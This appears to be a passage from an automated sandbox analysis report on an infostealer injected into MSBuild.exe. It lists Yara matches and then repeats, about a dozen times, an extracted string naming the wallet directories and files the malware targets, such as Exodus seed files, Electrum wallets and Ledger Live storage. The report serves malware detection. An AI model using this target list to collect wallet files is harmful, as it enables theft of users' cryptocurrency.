                    Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1769696324.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe PID: 6580, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6712, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local 